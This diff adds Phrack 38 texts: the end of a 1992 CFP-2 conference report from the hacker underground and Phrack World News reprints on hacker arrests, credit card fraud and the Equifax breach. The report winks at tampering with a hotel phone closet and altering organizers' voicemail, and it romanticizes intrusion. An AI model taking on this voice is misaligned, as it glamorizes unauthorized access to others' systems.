+of CFP-2, it's available on VHS; contact bkoball@well.sf.ca.us for more
+details.
+
+For the readers of PHRACK, a different perspective was in order.  The following
+commentary has been taken strictly from my notes and thoughts on the
+underground showing.
+
+Overall, this year's CFP was a success.  The panel discussions on everything
+>from the issues of privacy to Internet to cryptography and security were
+informative, even enlightening.  After three days of non-stop conferences on
+these subjects I realized just how much of a runaway horse technology is to our
+federal government.  Big Brother is definitely out there, but he's got fast
+competition coming up from the private sector.  And special thanks to CRAIG
+NEIDORF, who graciously donated his name to modern science and the EFF.  This
+individual's case was referred to more times than Roe v. Wade; personally,
+Craig, if I were you, I'd put a trademark on it and charge by the usage.  In
+any case, this year's CFP conference was a success.  Congrats are in order for
+the organizers and volunteers.  Anyone who is seriously interested in computer
+networks, security, and what the big fish are up to should attend.  Also,
+members of the press are welcome.
+
+Daily, in the aftermath of the conferences, "Birds of a Feather" sessions were
+held in the meeting rooms.  At best, these were well structured discussions for
+people of similar interests.  At worst, they were lame farces, such as the "Why
+Don't They Understand" discussion, where unofficial representatives of the
+underground were given a forum to supposedly voice their opinions.
+
+The panel consisted of Glen Tenney (organizer of the annual Hacker's
+conference), Knight Lightning (founder of Phrack, abused civil rights poster
+child for the EFF), Dispater (current publisher of Phrack), Emmanuel Goldstein
+(editor/publisher of 2600 magazine, host of "Off the Hook" [WBAI radio, New
+York]), Phiber Optik (hacker/phreak currently receiving a great deal of "fan
+harassment" by the authorities), Steven Levy (MacWorld, author of _Hackers_),
+Dorothy Denning (Computer Science Department, Georgetown University), and the
+panel chair was John McMullen of McMullen & McMullen.  Aside from a few hackers
+and law officials in the audience, the curious and uninformed filled the
+meeting room to capacity.  There was definitely a sense of anticipation prior
+to the start of the discussion; it didn't take a private eye to know that one
+way or the other, this was going to be a show.
+
+And it was.
+
+Steven Levy gave a neutral dissertation to the meaning of the word "hacker" as
+it was when he published his book by the same name back in 1986:  programmers
+and electronics hobbyists supposedly with purer intentions, many of which that
+went on to make revolutionary waves in the computer industry.  Hackers and
+phone phreaks like Wozniak and Jobs are two of those heroes of yesteryear's
+underground.  But as with the rest of society, nostalgia always casts a darker
+tint on the present.  Those heroes would be considered the maniacal high-tech
+terrorists of today, thanks to a combination of media sensationalism, a few
+malicious idiots on both sides of the law, and the general public opinion that
+hackers are to be feared like hardened outlaws -- all of which stems from
+varying degrees of ignorance.
+
+Dorothy Denning appended Levy's statement with an objective view, pointing out
+the fact that neither side seems to fully understand what it's like to walk in
+the other's shoes, befitting the title of the next session.  Another perfect
+neutrality.  Tenney interjected with a somewhat polished speech about what it
+was to be a hacker (i.e. programmer) back in his day, uttered a few slants
+directed at certain people, both of which smoothly establishing the slight
+anti-hack tone that would end up carrying on until this session ended.  Upon
+finding out this man is supposedly running for Congress in some state, I was
+even less surprised.  It was as if he smelled what the crowd wanted to hear,
+then cooked it up enough to feed everyone.  He's pretty good.  He'll probably
+get the seat he's shooting for.
+
+In his best radio voice, Emmanuel Goldstein immediately returned the volley to
+previous statements, also adding a few interpretations of his own:  the feeling
+of learning and exploring, even in forbidden regions, how it is unhealthy to
+put restrictions on thought and discovery, and how it is the complacency of the
+other side that the underground is making use of.  He also brought up a very
+good point concerning the Dutch and how many of the system administrators over
+there are making use of hackers in the bullet-proofing of their systems.  The
+distrust of most American sysadmins along with the level of arrogance in some
+cases almost makes such cooperation ludicrous over here in the states.  Shame.
+
+Each underground member of the panel eventually made his or her statement,
+including Phiber Optik's tale of how a certain New York State Police officer
+and gang rolled up on his home like the DEA and awakened him from his sleep at
+gun point.  Whether by coincidence or not, the officer in charge of the arrest
+was standing in the back of the room.  Of course, the voice of authority had to
+make a statemental come-back on the topic.  In that instant it became obvious
+that having hacks and law enforcement in the same room wasn't the best vehicle
+for accurately portraying views.  Neither side was prone to be open and honest
+with the other watching with anticipation.  Any hack who was not under
+investigation wouldn't dare open up and speak, and any hack currently under
+investigation couldn't speak honestly; no one wants to speak his piece bad
+enough to get indicted.  The feds were in the same boat, since they couldn't
+openly discuss any pending cases, as well as keeping a lid on any of their
+trade secrets; a catch-22 that further solidified the misconceptions of those
+in the middle:  the image of hackers as chaotic compu-hoodlums and law
+enforcement officials as determined yet uninformed trackers.
+
+In all honesty, this session came off like a side show, and the hackers like
+circus freaks.  With two prominent underground publishers, an ex-hack/publisher
+turned representative of the EFF, and a hack/phreak currently under
+investigation, there was no alternative but to stutter and give vague answers
+to delicate questions and even then that only applied to those occasions where
+they could speak their minds uninterrupted.  Self-preservation and the
+felonious core of this topic made every answer a forfeited one before it was
+given.  Any well-informed spectator knew this.  So did the feds, who were
+probably chuckling to themselves the entire time.  Absolutely no resolutions
+were made either way.  Truthfully, the feds gained brownie points on this one.
+The hacker perspective wasn't accurately presented and the masses would
+continue to live ignorance of the underground.
+
+The next night, random reports of strange activity churned through the rumor
+mill shortly after the hackers hijacked one of the meeting rooms for Knight
+Lightning's "Frank" Party, the kind of talk most people weren't bold enough to
+investigate or so "unthinkable" that no one wanted their name attached.  The
+room itself was easy to identify -- "Fire Line Do Not Cross" tape covered the
+front doors, as well as a chaotic chatter that roared from within.  There was
+no agenda to speak of.  Most of the hackers I've met during my travels were
+leaders and rugged individualists and here was no different.  None wanted to
+take charge -- to do so would have been useless.  Each generally did his own
+thing and, if it looked interesting enough, others would follow.  Some of the
+name-tagged feds would have probably wandered in if they weren't already having
+a session of their own.  Speculatively, they were discussing matters about
+targeted individuals present at our gathering.
+
+The evening's entertainment was an old cult-classic tape, Frank & The Phunny
+Phone Call, the hilarious and unexpurgated recordings of an old man driven to
+aggravated dementia by some anonymous phone phreaks making his phone "go
+berzerk."  Earlier at one of the literature tables, free promotional 2-in-1
+screwdrivers were given away (a gift from Hayes Modem Corporation) and it
+seemed that every hack in here had at least one or two.  Granted, these tools
+are handy for any computer buff, but a room full of hacks and phreaks with them
+was almost as unpredictable as handing out matches at a Pyromaniacs Anonymous
+meeting.  Soon, RJ-11 phone jacks were being unscrewed from the wall and
+studied.  Lineman's Test Phones appeared, soon followed by a small expedition
+stalking around the service hallways and finding the unlocked telephone closet
+for the hotel.  The rest is, shall we say, up to reader interpretation as to
+what happened after that, ironically ten yards and a set of double doors away
+>from a room full of state cops and feds.
+
+
+The Last Day
+
+Instead of rushing the microphone during the final statements in the main
+conference room, our rogue gang had coagulated in the hall (next to the
+payphones no less) around an Air Force special investigator and Phiber Optik.
+At first the mood resembled that of a James Bond movie, where Bond and an arch
+nemesis would meet and chat, each anticipating the downfall of the other
+beneath polite exteriors.  This seemed to be the sublime tension between all
+the feds and hacks who talked at the conference, but it was especially delicate
+in this case -- Phiber was high on the priority list this agent's department
+was currently investigating.  Eventually the mood lightened, and an impromptu
+Q&A pow-wow session between the hacks and the agent broke out, spawning all
+sorts of conversations that seemed much more interesting than the finale taking
+place inside.  And, like clockwork, a little mischief came into play.  As a
+show of good faith and a sign that the hackers would be returning for next
+year's conference, several prominent organizers found that the answer messages
+on their hotel voice mailboxes had been mysteriously "changed."  Sources say
+the culprit was described as an old Yiddish, but all reports on this matter
+were unconfirmed.  Shortly after this impromptu gathering, it was apparent that
+the conference had finally adjourned.  Except for the underground types and a
+few observers, the halls were thinning out, and eventually we all wandered our
+separate ways.  And once again, this environment began to take the look of a
+hotel.
+
+
+To The Underground At Large:
+
+This was just one conference; the feds will continue to do what they do and so
+will we.  After the hacker panel fiasco, I overheard John Markoff (New York
+Times reporter and co-author of the book _Cyberpunk_) and Steve Levy talking
+about how topics like this were being discussed in conferences like this ten
+years ago.  Only the names and circumstances had changed -- the song and dance
+steps remained the same.  Chances are, ten years from now these same subjects
+will share some portion of the limelight in regard to growth and development of
+cyberspace.  As society becomes more technologically complex, the bugs,
+loopholes, and defaults will exist and the underground will thrive.  Whether
+the masses choose to acknowledge this or not, we are a subculture of and to
+ourselves, much like the Grateful Dead followers.  Some will move on, die off,
+or fade away, and others will stream in to fill the empty spaces.  A few words
+of interpretive advice to the newbees:  study everything you touch carefully,
+covet and respect the knowledge you gain like a gun, and never drive faster
+than you can think.  The feds are out there and, trust me, these motherfuckers
+didn't come to play.
+
+
+To The Feds And Hacker Trackers Present At The Conference:
+
+There isn't much that can be said.  You have a much better understanding of the
+computer underworld than most, even than by some of those in it.  By virtue of
+the job you do, this is a given.  Respect is due to you for your showing at
+CFP-2, how you presented yourselves, and the subtle way you furthered the
+brainwashed concepts of "the hacker" in the public eye.  You knew the
+presentations would be slanted in your favor, and probably took great pride in
+this.  Smooth.  Very smooth.
+
+
+To The Uninformed:
+
+Don't blindly believe the hype.  Whether you wish to face it or not, hackers
+and phone phreaks are an integral part of this technological revolution.
+Advancement cannot come without the need for change and to improve, both micro-
+and macroscopically.  Positive direction is the result of an equal but opposite
+force that presses it forward.  Because of the hackers (old, new, and even the
+malicious), software and hardware developers have made radical improvements on
+the networks and supermachines that are undeniably molding the foundation of
+tomorrow's world.  Our society is based on complacency.  And any social
+institution or machinery that seems to work without weight to tip the scales of
+change simply goes unchecked, eventually to become a standard.  The hijinx that
+Congress gets away with and how little the public truly reacts is a perfect
+example.  If hackers didn't truly love computers and telecommunications or have
+an unnatural need to explore and learn, the technological growth curve would be
+stunted.  Long after these embryotic times have faded into our grandchildren's
+history books, hackers will exist, and the bulk of high-tech crimes will
+continue to be perpetrated by minions of the people in power, the elite white-
+collar.
+
+Regardless of the long-term insight, computer intrusion is still an illegal art
+and science.
+
+There is no rationale for why hackers hack, at least nothing that will
+withstand the scrutiny of the unenlightened masses or one's inner beliefs.
+"Hackers," like any other subculture, yield a range of personalities and
+perspectives from the careful explorer to the callous marauder.  Inexperienced
+sociologists would probably try to classify this underground sect as a
+movement, possibly even subversive in its intentions.  The problem with this
+lies in the fact that a movement needs a leader or spokesman.  Aside from the
+individual nature of these people, anyone who becomes a mouthpiece for this
+culture cannot rightly be a hacker, or at least hacking around with anything
+unlawful.  Chances are, others would shy away from such a person, seeing him as
+either an informant or too dangerous to be around; the feds would pursue him
+passionately, like tracking a trophy-sized bull in a deer hunt.  Hackers cannot
+be categorized as a movement, fad, or pre-packaged subculture like bubble-gum
+rock music or the pseudo-hippies of the 90's.  Most hackers have their own
+directions and forward momentum.  It is a shared mindset, ironically
+paralleling that of the feds that chase them.  One group has no rules or set
+channels to adhere to. The other is backed by the establishment and a badge.
+
+This statement was not intended to rationalize their actions, only give insight
+to the uninitiated.  To summarize the spectrum of motives with the hacker
+intellect, I give this analogy:  the need to come onto someone else's property,
+some for peaceful exploration, others to inhabit, and in some instances to
+misuse or destroy is not a new phenomena.  The early settlers of this country
+did the same thing to the Native Americans.
+
+
+                                                        I\/Iax I\Iomad
+
+                                                    [Mission X Tribe Out]
+
+                                  [---------]
+
+Thanks and respect are due to:
+
+Basil Rouland Inc. (for getting me there) and URban Lividity, Jet Heller,
+Silkworm, and the rest of the "In The Flesh" (804-489-7031) posse that couldn't
+make the trip.  mXt.
+_______________________________________________________________________________
diff --git a/phrack38/13.txt b/phrack38/13.txt
new file mode 100644
index 0000000..9ea78eb
--- /dev/null
+++ b/phrack38/13.txt
@@ -0,0 +1,688 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 13 of 15
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN      Issue XXXVIII / Part One of Three      PWN
+              PWN                                             PWN
+              PWN        Compiled by Dispater & Friends       PWN
+              PWN                                             PWN
+              PWN     Special Thanks to Datastream Cowboy     PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Warning: Multiplexor/The Prisoner Tells All                     April 10, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+On approximately April 3, 1992, Multiplexor (a/k/a The Prisoner) illegally used
+credit card information obtained from CBI/Equifax to purchase an airline ticket
+to San Diego, California from his home in Long Island, New York.  Upon his
+arrival, MP was met by several agents of the Federal Bureau of Investigation.
+
+After his apprehension, MP was taken first to a computer store where agents
+allegedly picked up a computer from the store manager who is a friend of either
+one of the agents or a federal prosecutor involved in the case.
+
+At the taxpayer's expense, Multiplexor was put up for at least a week at a
+Mariott Hotel in San Diego while he told all that he ever knew about anyone to
+the FBI.  It is believed that "Kludge," sysop of the San Diego based BBS
+Scantronics has been implicated, although reportedly his board does not contain
+ANY illegal information or other contraband.
+
+It is widely known that card credit abusing scum like Multiplexor are
+inherently criminal and will probably exaggerate, embellish and otherwise lie
+about other people in order to escape prosecution themselves.  If you have ever
+come into contact with Multiplexor -- beware.  He may be speaking about you.
+
+Incidentally, Multiplexor had this year submitted a poorly written and ill-
+conceived article to Phrack about voice mail hacking.  His article was denied
+publication.
+
+And now this is the final result...
+
+ Nationwide Web of Criminal Hackers Charged                      April 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+San Diego -- According to a San Diego Union-Tribune report, San Diego police
+have uncovered "an electronic web of young computer hackers who use high-tech
+methods to make fraudulent credit card charges and carry out other activities."
+
+The Friday, April 17th story by Bruce V. Bigelow and Dwight C. Daniels quotes
+San Diego police detective Dennis Sadler as saying that this informal
+underground network has been trading information "to further their political
+careers."  He said that the hackers know how to break computer security codes,
+create credit card accounts, and make fraudulent credit card purchases.  Sadler
+estimated that as many as 1,000 hard-core hackers across the United States have
+shared this data although he said that it's unclear how many have actually used
+the information to commit crimes.
+
+Sadler added that he estimated that illegal charges to credit cards could total
+millions of dollars.
+
+While the police department did not release details to support the allegations,
+saying that the investigation is continuing, Sadler did say that cooperation
+>from an "out-of-state hacker," picked up in San Diego, provided important
+information to the police and the FBI.  Although police would not release the
+identity of this individual or his present whereabouts, information gathered
+by Newsbytes from sources within the hacker community identifies the so-called
+hacker as "Multiplexer", a resident of Long Island, NY, who, according to
+sources, arrived in San Diego on a airline flight with passage obtained by
+means of a fraudulent credit card purchase.  The San Diego police, apparently
+aware of his arrival, allegedly met him at the airport and took him into
+custody.  The same sources say that, following his cooperation, Multiplexer was
+allowed to return to his Long Island home.
+
+The Union-Tribune article linked the San Diego investigation to recent federal
+search and seizures in the New York, Philadelphia and Seattle areas.  Subjects
+of those searches have denied to Newsbytes any knowledge of Multiplexer,
+illegal credit card usage or other illegal activities alleged in the Union-
+Tribune story.  Additionally, law enforcement officials familiar with on-going
+investigations have been unwilling to comment, citing possible future
+involvement with the San Diego case.
+
+The article also compared the present investigation to Operation Sun-Devil, a
+federal investigation into similar activities that resulted in a massive search
+and seizure operation in May 1990.  Although individuals have been sentenced in
+Arizona and California on Sun Devil related charges, civil liberties groups,
+such as the Computer Professionals for Social Responsibility, have been
+critical about the low number of criminal convictions resulting from such a
+large operation.
+_______________________________________________________________________________
+
+ Sun-Devil Becomes New Steve Jackson Game                        March 25, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Steve Jackson
+
+It couldn't have been more than a week after the initial raid when people
+started saying, "Hey, why don't you make a game out of it?"  The joke wore thin
+quickly, as I heard it over and over and over during the next year.  Then I
+realized that I was in serious danger of losing my sense of humor over this...
+and that actually, it would be possible to do a pretty good game about hacking.
+So I did.
+
+In 1990, the Secret Service raided Steve Jackson Games when a "hacker hunt"
+went out of control.  Loss of our computers and unfinished game manuscripts
+almost put this company out of business.
+
+It's been two years.  We're back on our feet.  And ever since the raid, fans
+have been asking, "When are you going to make a game out of it?"
+
+Okay.  We give up.  Here it is.
+
+The game has enough fanciful and pure science-fiction elements that it's not
+going to tutor anyone in the arcane skills.  Neither is it going to teach the
+sysadmin any protective tricks more sophisticated than "don't leave the root
+set to default."  But it is, I think, a good simulation of the *social*
+environment of High Hackerdom.  You want to outdo your rivals -- but at the
+same time, if you don't share knowledge with them, you'll never get anywhere.
+And too many wannabes on the same system can mess it up for everybody, so when
+you help somebody, you ask them to try it out *somewhere else* . . . and
+occasionally a hacker finds himself doing the sysadmin's housecleaning, just to
+preserve his own playground against later intruders.  I like the way it plays.
+
+In HACKER, players compete to invade the most computer systems.  The more
+systems you crack, the more you learn, and the easier the next target is.  You
+can find back doors and secret phone lines, and even crash the systems your
+rivals are using.  But be careful.  There's a Secret Service Raid with your
+name on it if you make too many enemies.
+
+Designed by Steve Jackson, the game is based on the award-winning ILLUMINATI.
+To win at HACKER requires guile and diplomacy.  You must trade favors with your
+fellow hackers -- and get more than you give away.  But jealous rivals will try
+to bust you.  Three busts and you're out of the game.  More than one player can
+win, but shared victories are not easy!
+
+HACKER is for 3-6 players.  Playing time is under an hour for the short game
+and about 2 hours for the regular game.  Components include a rule book, 110
+cards, marker chips, 6 console units, system upgrades, Bust markers, and Net
+Ninja marker, two dice and a Ziplock bag.
+
+Hacker began shipping March 30, and has a suggested retail price of $19.95.
+_______________________________________________________________________________
+
+ "Peter The Great " Had An Overbyte                            January 10, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Kay Kusumoto (The Seattle Times)(Page B1)
+
+                   "Teenage Hacker Ring Bigger Than Thought"
+
+Bellevue, Washington -- Imagine you're a 17-year-old computer whiz who has
+figured out how to get into the phone-company computer to make long-distance
+calls for free.
+
+Imagine finding at the tip of your fingers step-by-step instructions on how to
+obtain credit-card numbers.
+
+And imagine once more the name you use to log on to a computer system isn't
+really your own, but actually a tag, or moniker -- like, say, that of a Russian
+czar.
+
+Bellevue police say that's the name an Issaquah teenager used when sending
+messages to fellow hackers all over the country.
+
+They first arrested "Peter the Great" a month ago for investigation of
+attempted theft in using an unauthorized credit-card number to try to purchase
+a $4,000 computer from a store in Bellevue.
+
+But now police, who are still investigating and have not yet filed charges,
+believe they're on to something much larger than first suspected.  They say
+they are looking for one or two additional youths involved with the 17-year-old
+in a large computer-hacking ring that uses other people's credit-card numbers
+to purchase computers and software.
+
+In the youth's car, police say, they found another $4,000 computer obtained
+earlier that day from a Seattle computer store.  They also claim to have found
+documents suggesting the youth had used credit information illegally.
+
+Police Lt. Bill Ferguson of Bellevue's white-collar crime unit said detectives
+don't know how many people are involved in the scam or how long it has been
+going on.  And police may never know the dollar loss from businesses and
+individuals, he said.
+
+"You can guess as high as you want," Ferguson said.  "He had connections clear
+across the country."
+
+After the youth was arrested, police say, he admitted to being a hacker and
+using his parents' home computer and telephone to call boards.
+
+An elaborate type of e-mail -- the bulletin boards offer the user a electronic
+messaging -- system, one may gain access to a "pirate" bulletin directory of
+"how to" articles on ways of cracking computer systems containing everything
+>from credit records and phone accounts to files in the University of
+Washington's chemistry department.
+
+Once the youth decided which articles he wanted most, he would copy them onto
+his own disk, said Ferguson.  Now police are poring over hundreds of disks,
+confiscated from his parents' house, to see just how much information he had.
+The parents knew nothing of what was going on, police say.  Ferguson said
+police also seized a copy of a New York-based magazine called 2600, aimed at
+hackers.  Like the bulletin boards, the magazine provides readers with a
+variety of "how to" articles.
+
+The teenager, who was released to his parents' custody the day of his December
+3 arrest, told police the magazine taught him how to use a device that can
+imitate the sound of coins dropping into a pay phone.  With that, he could dial
+outside computers for free.
+
+Police confiscated the device.
+
+"Hackers are difficult to trace because they don't leave their name on
+anything," Ferguson said, adding that a federal investigation may follow
+because detectives found copies of government documents on the youth's disks.
+
+"This kid (copied) hundreds of pages of articles, left messages and shared
+(computer) information with other hackers," said Ferguson.
+
+"What's common about the hacker community is that they like to brag about their
+accomplishments -- cracking computer systems.  They'll tell each other so
+others can do it."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Hotel Credit Doesn't Compute                                  January 22, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Stephen Clutter and Kay Kusumoto (The Seattle Times)(Page D1)
+
+                        "Kirkland Police Suspect Hacker"
+
+Kirkland, Washington -- Police are investigating yet another potential computer
+hacking case, this one at the Woodmark Hotel in Kirkland.
+
+Someone, according to hotel officials, got into the Woodmark's computer system
+and gave themselves a $500 credit for a hotel room earlier this month.
+
+Police say a 19-year-old Bellevue man is the main suspect in the case, although
+no arrests have been made.
+
+The incident surfaces at the same time as Bellevue police press their
+investigation into their suspicions that a 17-year-old Issaquah youth, using
+the computer  name "Peter the Great," got access to credit-card numbers to
+purchase computers and software.  That suspect was arrested but is free pending
+charges.
+
+"The deeper we get into Peter's files, the more we're finding," Bellevue police
+Lt. Bill Ferguson said.
+
+After arresting the youth last month on suspicion of trying to use an
+unauthorized credit-card number to purchase a $4,000 computer from a Bellevue
+store, police confiscated hundreds of computer disks and have been searching
+the electronic files for evidence.
+
+"We've been printing one file out for three hours now -- and it's still
+printing," Ferguson said yesterday.
+
+The file, Ferguson estimated, contains at least 10,000 names of individuals,
+with credit-card numbers and expiration dates, addresses, phone numbers and
+Social-Security numbers.
+
+Detectives will meet with the Bellevue city prosecutor later this week to
+discuss charges.
+
+In the Kirkland incident, the 19-year-old Bellevue man stayed in the hotel the
+night of January 11, according to Kirkland Detective Sgt. Bill O'Brien.
+
+The man apparently made the reservation by phone a few days earlier and was
+given a confirmation number.  When he went to check into the hotel on January
+11, the receptionist found that a $500 credit had been made to his room
+account, O'Brien said.
+
+Woodmark officials, fearing they had a hacker problem, contacted Bellevue
+police last week after reading news accounts of the arrest of "Peter the
+Great."
+
+"The hotel said they had read the story, and discovered what appeared to be a
+break-in to their computer system," said Ferguson.  "They wanted to know if
+maybe it was related to our "Peter the Great" case."
+
+Police don't know, Ferguson said -- and that's one of the things under
+investigation.
+
+The main suspect in the Woodmark case had worked at the hotel for five days in
+1990, police say, and may have had access to the hotel's computer access code.
+Hotel officials suspected they had a hacker on their hands because phone
+records indicate that the $500 credit was made via a telephone modem and not by
+a keyboard at the hotel, Ferguson said.  The problem was discovered after an
+audit showed the $500 was never paid to the hotel.
+
+So what happened during the free night at the Woodmark?
+
+"They partied and made various phone calls, including nine to the University of
+Washington," O'Brien said.
+
+The calls to the university went to an answering machine at the Medical Center,
+police say, and there is no indication the men were able to hack their way into
+the university's computer system.
+
+They were up to something, though, and police want to know what.  "We're going
+to start with the (19-year-old Bellevue) kid, and start from there," O'Brien
+said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Hacker Charged With Fraud                                    February 14, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Kay Kusumoto (The Seattle Times)(Page F3)
+
+                   "Teen Computer Whiz May Be Part Of A Ring"
+
+"Peter the Great" played courier for "Nighthawk."
+
+He was supposed to pick up a couple computers purchased with an unauthorized
+credit-card number from a computer store in Bellevue, Washington last December.
+
+He never finished the transaction.  A suspicious clerk called police and
+"Peter" was arrested for attempted theft.
+
+But that was only the beginning.
+
+The Issaquah teenager who went by the computer name "Peter the Great" was
+charged yesterday in King County Juvenile Court with attempted theft,
+possession of stolen property, telephone fraud and computer trespass..
+
+The arrest of the 17-year-old computer whiz led Bellevue police on an
+investigation into the underground world of computer hacking.
+
+Police are still investigating the case and say they believe it involves
+members of a large computer-hacking ring who use other people's credit-card
+numbers to purchase computers and software.
+
+Court documents allege the youth was after two $1,800 computers on December 3,
+1991, the day he walked into a Bellevue computer store to pick up an order for
+an unknown associate who went by the hacker moniker "Nighthawk."
+
+The computers had been ordered with a credit-card number given over the phone
+by a man identifying himself as Manuel Villareal.  The caller told the clerk
+that another man named Bill Mayer would pick up the order later in the day.
+
+But a store clerk became suspicious when the youth, who said he was Bill Mayer,
+"appeared very nervous" while he was inside the store, court papers state.
+
+When the youth couldn't provide enough identification to complete the
+transaction, the clerk told him to have Villareal come into the store and sign
+for the computers himself.
+
+After the youth left, the clerk called police, and "Peter" was arrested later
+that day.
+
+A search of his car revealed a torn up VISA card, several computer disks, two
+more computers, a receipt from a computer store in Seattle and several pieces
+of paper with credit-card numbers on them, court papers state.
+
+The youth also had in his possession a red box, a device that simulates the
+sound of coins dropping into a pay phone.
+
+After his arrest, the youth told police that "Nighthawk" had telephoned the
+computer store and used Villareal's name and credit-card number to make the
+purchase in Bellevue.
+
+The teen admitted to illegally using another credit-card number to order a
+computer from a store in Seattle.  The computer was picked up later by another
+unknown associate.
+
+The youth also told police that another associate had hacked his way into the
+computer system of a mail-order house and circulated a list of 14,000 credit
+card numbers through a computer bulletin board.
+_______________________________________________________________________________
+
+ Computer Hackers Nabbed                                       January 29, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ By Michael Rotem (The Jerusalem Post)
+
+Four computer hackers were arrested and their equipment seized in raids by
+police and Bezek security officers on four homes in the center and north of the
+country.  They were released on bail yesterday after questioning.
+
+The four, two minors and two adults, are suspected of purloining passwords and
+then breaking the entry codes of international computer services and toll-free
+international telephone switchboards, stealing thousands of dollars worth of
+services.
+
+The arrests were made possible after National Fraud Squad officers joined
+Bezek's efforts to discover the source of tampering with foreign computer
+services.
+
+A Bezek source told The Jerusalem Post that all four suspects had used personal
+computers and inexpensive modems.  After fraudulently obtaining several
+confidential passwords necessary to enter Isranet -- Israel's national computer
+network -- the four reportedly linked up to foreign public data banks by
+breaking their entrance codes.
+
+This resulted in enormous bills being sent to the password owners, who had no
+idea their personal secret access codes had been stolen.
+
+The four are also suspected of illegally obtaining secret personal credit
+numbers used by phone customers to call abroad.  The suspects reportedly made
+numerous telephone conversations abroad worth thousands of shekels.
+
+A police spokesman said cooperation between Bezek's security department and the
+police National Fraud Squad will continue, in order to "fight these felonies
+that cause great financial damage."  Bezek spokesman Zacharia Mizrotzki said
+the company is considering changing the secret personal passwords of network
+users on a frequent basis.
+_______________________________________________________________________________
+
+ Hackers Get Free Credit                                      February 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ By Doug Bartholomew (Information Week)(Page 15)
+
+Banks and retail firms aren't the only ones peeking at consumers' credit
+reports.  Equifax Inc., one of the nation's three major credit bureaus admitted
+that some youthful computer hackers in Ohio had penetrated its system,
+accessing consumers' credit files.  And if it wasn't for a teenager's tip, they
+would still be at it.
+
+"We do not know how the hackers obtained the access codes, but we do know the
+confidentiality requirements for membership numbers and security pass-codes
+were breached," says a spokesman at Equifax.  The company, which had revenue of
+$1.1 billion in 1991, possesses a database of some 170 million credit files.
+
+A customer number and access code must have been given to the teenagers, or
+stolen by them, adds the spokesman, who says Equifax "plans to increase the
+difficulty of accessing the system."  Theft of computer access codes is a
+federal crime.
+
+Virtually No Protection
+
+Critics of the credit agencies say such breaches are common.  "There is
+virtually no protection for those systems," says a spokesman for the Computer
+Professionals for Social Responsibility, a Washington association.  "If some
+car salesman leaves the information sitting on his desk, someone could just
+pick up the codes."
+
+As of last week, Dayton police had made no arrests.  But they searched the
+homes of two young men, age 18 and 15, confiscating half a dozen PCs and
+numerous floppy disks.
+
+The two are thought by police to be part of a group of up to 50 hackers
+believed to be behind the systems break-in.  The group is also under
+investigation for allegedly making $82,000 worth of illegal phone calls using
+an 800 number provided to business customers of LDDS Communications Inc., a
+long-distance service in Jackson, Mississippi.  LDDS was forced to disconnect
+the 800 number on November 15, 1991.
+_______________________________________________________________________________
+
+ Two Cornell Students Charged In Virus Attacks                February 26, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Grant Buckler (Newsbytes)
+ Also see Phrack 37, File 11 -- Phrack World News
+
+Ithaca, New York -- Charges have been laid against two Cornell University
+students accused of planting a virus that locked up Apple Macintosh computers
+at Cornell, at Stanford University in California, and in Japan.
+
+David S. Blumenthal and Mark Andrew Pilgrim, both aged 19, were charged in
+Ithaca City Court with one count each of second-degree computer tampering, a
+Class A misdemeanor.  The investigation is continuing and additional charges
+are likely to be laid, said Cornell University spokeswoman Linda Grace-Kobas.
+Both students spent the night in jail before being released on bail February
+25, Grace-Kobas added.
+
+The MBDFA virus apparently was launched February 14 in three Macintosh computer
+games:  Obnoxious Tetris, Tetriscycle, and Ten Tile Puzzle.  Apparently, a
+computer at Cornell was used to upload the virus to the SUMEX-AIM computer
+archive at Stanford University and an archive in Osaka, Japan.
+
+MBDFA is a worm, a type of computer virus that distributes itself in multiple
+copies within a system or into connected systems.  MBDFA modifies systems
+software and applications programs and sometimes results in computer crashes,
+university officials reported.
+
+Reports of the MBDFA virus have been received from across the United States and
+>from around the world, including the United Kingdom, a statement from the
+university said.
+_______________________________________________________________________________
+
+ Judge Orders Hacker To Stay Away From Computers                 March 17, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Jim Mallory (Newsbytes)
+
+DENVER, COLORADO -- A computer hacker who pleaded guilty to breaking into space
+agency computer systems was ordered to undergo mental health treatment and not
+use computers without permission from his probation officer.
+
+The 24 year-old man, a resident of suburban Lakewood, was sentenced to three
+years probation in what is said to be one of only five prosecutions under the
+federal computer hacker law.
+
+The man pleaded guilty last year to one count of breaking into a National
+Aeronautics and Space Administration (NASA) computer, after NASA and the
+Federal Bureau of Investigation agents tracked him down in 1990.  Prosecutors
+said the man had spent four years trying to get into computer systems,
+including those of some banks.
+
+Prosecutors said the man had gained access to a Defense Department computer
+through the NASA system, but declined to give any details of that case.  The
+indictment did not explain what had occurred.
+
+In the plea bargain agreement, the man admitted he gained access to NASA's
+computers "by exploiting a malfunction in a public access NASA computer
+bulletin board service."
+
+The man was described as an unemployed loner who had spent most of his time
+using a computer at home.  The prosecutor was quoted as saying the man needed
+counselling "on a social level and for personal hygiene."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Hacker Journeys Through NASA's Secret World                     March 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Scripps Howard (Montreal Gazette)(Page A5)
+
